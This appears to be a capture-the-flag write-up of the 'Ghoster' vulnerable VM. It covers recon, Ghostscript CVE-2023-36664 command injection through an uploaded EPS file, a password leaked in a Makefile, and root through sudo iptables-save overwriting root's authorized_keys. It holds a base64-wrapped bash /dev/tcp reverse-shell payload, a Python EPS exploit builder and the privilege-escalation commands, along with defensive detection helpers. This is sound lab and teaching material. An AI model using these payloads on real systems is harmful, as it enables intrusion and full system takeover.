
VulnVM-Ghoster

Tags: VulnVM, Linux
Author: HYH
A technology enthusiast focused on cyber security, penetration testing and CTF challenges, who enjoys documenting hands-on experience and sharing tools and techniques, and is committed to continuous learning and growth.

Box Info

OS: Linux
Difficulty: Medium

Nmap

[root@kali] /home/kali/ghoster  
❯ nmap 192.168.55.65 -sV -A -p-                                                                                                              
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 c5:5f:01:14:c9:d4:fe:8e:9c:01:5f:3a:2c:dd:38:64 (ECDSA)
|_  256 63:25:3e:2b:61:4f:21:86:fa:d9:e5:d5:b6:bd:e8:29 (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
8081/tcp open  http    Werkzeug httpd 3.1.3 (Python 3.11.2)
|_http-title: Document Submission Portal
|_http-server-header: Werkzeug/3.1.3 Python/3.11.2

Gobuster

[root@kali] /home/kali/ghoster  
❯ gobuster dir -u 'http://192.168.55.65/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.55.65/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/uploads              (Status: 301) [Size: 316] [--> http://192.168.55.65/uploads/]
/.php                 (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================

CVE-2023-36664

Nothing directly exploitable on port 80, so move on to port 8081.


Uploading here does not land anything in /uploads on port 80, nothing is echoed back, and the extension filter is a strict whitelist.


The .eps extension is uncommon; searching for it points to the Ghostscript command-injection bug CVE-2023-36664.


[root@kali] /home/kali/ghoster/CVE-2023-36664-Ghostscript-command-injection (main) 
❯ python3 CVE_2023_36664_exploit.py --inject --payload "printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41NS40LzQ0NDQgMD4mMSkgJg==|base64 -d|bash" --filename file.eps
[+] Payload successfully injected into file.eps.

Then the reverse shell came back.

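As an added example (not the exploit script the page ran, whose internals are not shown here), the following Python builds an injected EPS of the same shape: Ghostscript's documented pipe-device syntax `(%pipe%cmd) (w) file`, with the shell command base64-wrapped exactly as the page's --payload is, plus the defensive check an upload handler should run before handing any file to Ghostscript. The helper names are this example's own; it assumes the portal renders submitted EPS files with a Ghostscript whose pipe-device permission validation is bypassable (CVE-2023-36664), consistent with the /opt/ghostscript-9.22 tree that the grep output further down shows.

```python
import base64

# Added example, not the page's exploit script. Helper names (wrap_payload,
# build_eps, find_pipe_devices) are this example's own.


def wrap_payload(cmd: str) -> str:
    """Base64-wrap a shell command so the text placed inside the PostScript
    string literal contains no '(' ')' '>' or '&'. Parentheses would end the
    literal early, and '>' '&' would be interpreted by the shell that the
    %pipe% device spawns. This is the same shape as the page's --payload."""
    b64 = base64.b64encode(cmd.encode()).decode()
    return f"printf {b64}|base64 -d|bash"


def build_eps(shell_cmd: str) -> bytes:
    """Minimal EPS whose only real content is a %pipe% device opened for
    writing. `(%pipe%cmd) (w) file` is Ghostscript's documented pipe-device
    syntax; Ghostscript through 10.01.1 mishandled permission validation for
    pipe devices (CVE-2023-36664), so a vulnerable renderer runs cmd while
    interpreting the file."""
    inner = wrap_payload(shell_cmd)
    lines = [
        "%!PS-Adobe-3.0 EPSF-3.0",
        "%%BoundingBox: 0 0 100 100",
        f"(%pipe%{inner}) (w) file",
        "showpage",
        "%%EOF",
    ]
    return ("\n".join(lines) + "\n").encode()


def find_pipe_devices(ps_bytes: bytes) -> list:
    """Defensive counterpart for an upload handler: return every line that
    opens a pipe device, via the %pipe% prefix or the bare '|' prefix that
    the CVE description also names. A non-empty result means the file must
    be rejected before Ghostscript sees it, whatever its extension says."""
    hits = []
    for raw in ps_bytes.splitlines():
        line = raw.decode("latin-1")
        lowered = line.lower()
        if "%pipe%" in lowered or "(|" in lowered:
            hits.append(line.strip())
    return hits


if __name__ == "__main__":
    # Constructed sample: a reverse shell to an attacker box, with the same
    # address and port as the page's payload.
    eps = build_eps("(bash >& /dev/tcp/192.168.55.4/4444 0>&1) &")
    print(eps.decode())
    print("pipe devices found:", find_pipe_devices(eps))
```

The base64 step is not cosmetic: decoding the page's own payload string gives `(bash >& /dev/tcp/192.168.55.4/4444 0>&1) &`, a bash reverse shell whose parentheses and redirections could not be placed raw inside a PostScript string literal. Note that a whitelist on file extension, as the portal has, gives no protection here, because the dangerous content is PostScript text inside a perfectly valid .eps file; the content check above, or simply not rendering untrusted PostScript with an unpatched Ghostscript, is what matters.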

Own John

Grep for the string directly.

www-data@debian:/opt$ grep -r 'john' .


./ghostscript-9.22/doc/History9.htm:<br>Ray Johnston &lt;ray.johnston@artifex.com&gt;<br>
./ghostscript-9.22/doc/History9.htm:<br>Ray Johnston &lt;ray.johnston@artifex.com&gt;<br>
./ghostscript-9.22/doc/History9.htm:<br>Ray Johnston &lt;ray.johnston@artifex.com&gt;<br>
./ghostscript-9.22/doc/History9.htm:<br>Ray Johnston &lt;ray.johnston@artifex.com&gt;<br>
./ghostscript-9.22/doc/History9.htm:<br>Ray Johnston &lt;ray.johnston@artifex.com&gt;<br>
./ghostscript-9.22/doc/History8.htm:john_clippedimage.pdf
./ghostscript-9.22/devices/gdevifno.c: * dithering tables courtesy of john hobby
./ghostscript-9.22/Makefile.in:# john:4Vn3r@bl3DevAcc3ss

Root

Check sudo.

john@debian:~$ sudo -l
Matching Defaults entries for john on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User john may run the following commands on debian:
    (ALL) NOPASSWD: /usr/sbin/iptables
    (ALL) NOPASSWD: /usr/sbin/iptables-save

You can refer to the article on this; haven't I done this before? Turns out I ran into it on HTB.

john@debian:~$ ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/john/.ssh/id_ed25519): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/john/.ssh/id_ed25519
Your public key has been saved in /home/john/.ssh/id_ed25519.pub
The key fingerprint is:
SHA256:WK4qgaoyeVRH8+YB0MyuSRZcW9xxa9Tk8wNKrqHcScs john@debian
The key's randomart image is:
+--[ED25519 256]--+
|   ..*......oo.  |
|    o Bo. .o o.  |
|     +.+.  .o.o  |
|    + o++ o.. .o |
| . + +.oS+ o   ..|
|. o o ..* =     .|
|.o .  .o E       |
|= o  .           |
|+o ..            |
+----[SHA256]-----+
john@debian:~$ 
john@debian:~$ cat ~/.ssh/id_ed25519.pub 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAAV3inh8dQh4PqqZ3uW8vWiB9aJQNxCPZE9S/DhrXdR john@debian
john@debian:~$ 

Then use the rule dump to overwrite root's authorized_keys.

john@debian:~$ sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\n ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAAV3inh8dQh4PqqZ3uW8vWiB9aJQNxCPZE9S/DhrXdR john@debian\n'
john@debian:~$ sudo /usr/sbin/iptables -S
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A INPUT -i lo -m comment --comment "
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAAV3inh8dQh4PqqZ3uW8vWiB9aJQNxCPZE9S/DhrXdR john@debian
" -j ACCEPT
john@debian:~$ sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys
john@debian:~$ ssh root@localhost
The authenticity of host 'localhost (::1)' can't be established.
ED25519 key fingerprint is SHA256:g/sXDPjqMQ6xziAXUh9wGDT+oCQ5e85asA9DjLDDWbY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ED25519) to the list of known hosts.
Linux debian 6.1.0-31-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.128-1 (2025-02-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri May 16 04:45:34 2025 from 10.0.0.175
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:~# 
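Why a file full of iptables-save framing still works as authorized_keys: sshd reads it line by line, strips leading whitespace, ignores blank and `#` lines, and silently skips any line that does not parse as a key, so only the line embedded in the rule comment matters. The added example below (not code from the page) mimics that leniency in Python and adds an audit helper that flags the foreign lines a defender should never see in that file. The sample file content is constructed from the `iptables -S` output above, with the usual iptables-save header, chain-policy and COMMIT framing assumed; the function names are this example's own.

```python
import base64
import struct

# Constructed sample: what /root/.ssh/authorized_keys looks like after the
# `iptables-save -f` trick above. The rule is taken from the page's
# `iptables -S` output; the header/policy/COMMIT framing is the normal
# iptables-save layout and is assumed here.
DUMPED_AUTHORIZED_KEYS = """\
# Generated by iptables-save
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -m comment --comment "
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAAV3inh8dQh4PqqZ3uW8vWiB9aJQNxCPZE9S/DhrXdR john@debian
" -j ACCEPT
COMMIT
# Completed
"""


def parse_key_line(line: str):
    """Mimic sshd's per-line leniency: drop leading whitespace, ignore blank
    and '#' lines, then require '<type> <base64> [comment]' where the decoded
    blob starts with a length-prefixed string equal to the type. Anything
    else is skipped, which is why the iptables-save framing does no harm.
    (sshd also accepts an options prefix before the type; the injected line
    has none, so that case is left out here.)"""
    stripped = line.lstrip(" \t")
    if not stripped or stripped.startswith("#"):
        return None
    fields = stripped.split()
    if len(fields) < 2:
        return None
    ktype, b64 = fields[0], fields[1]
    try:
        blob = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if len(blob) < 4:
        return None
    (n,) = struct.unpack(">I", blob[:4])
    if blob[4:4 + n] != ktype.encode():
        return None
    return ktype, b64, " ".join(fields[2:])


def accepted_keys(text: str) -> list:
    """Keys sshd would honour from this file content."""
    return [k for k in (parse_key_line(l) for l in text.splitlines()) if k]


def foreign_lines(text: str) -> list:
    """Audit helper: lines that are neither a key, a comment, nor blank.
    A non-empty result for /root/.ssh/authorized_keys is a strong sign the
    file was written by something other than ssh-copy-id or an admin, e.g.
    an arbitrary-file-write abuse like the sudo iptables-save one above."""
    out = []
    for line in text.splitlines():
        s = line.strip()
        if s and not s.startswith("#") and parse_key_line(line) is None:
            out.append(s)
    return out


if __name__ == "__main__":
    for ktype, _, comment in accepted_keys(DUMPED_AUTHORIZED_KEYS):
        print("accepted:", ktype, comment)
    for junk in foreign_lines(DUMPED_AUTHORIZED_KEYS):
        print("foreign line:", junk)
```

Two caveats worth stating. First, the login at the end relies on sshd still accepting public-key authentication for root, which Debian's default `PermitRootLogin prohibit-password` does; with `PermitRootLogin no` the same file write would need a different target (a cron entry, a sudoers drop-in, and so on). Second, the sudo rule is the real defect: `iptables-save -f` writes wherever it is pointed, so granting it with free arguments and NOPASSWD is an arbitrary file write as root, not a firewall permission. The fix is to remove the rule or pin its arguments in sudoers, and to alert on non-key lines appearing in any authorized_keys file.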

Summary

User: command injection through the Ghostscript bug (CVE-2023-36664) gives a shell as www-data; john's password is sitting in a build file under /opt (ghostscript-9.22/Makefile.in).

Root: privilege escalation through sudo iptables/iptables-save, also seen on an earlier HTB box.
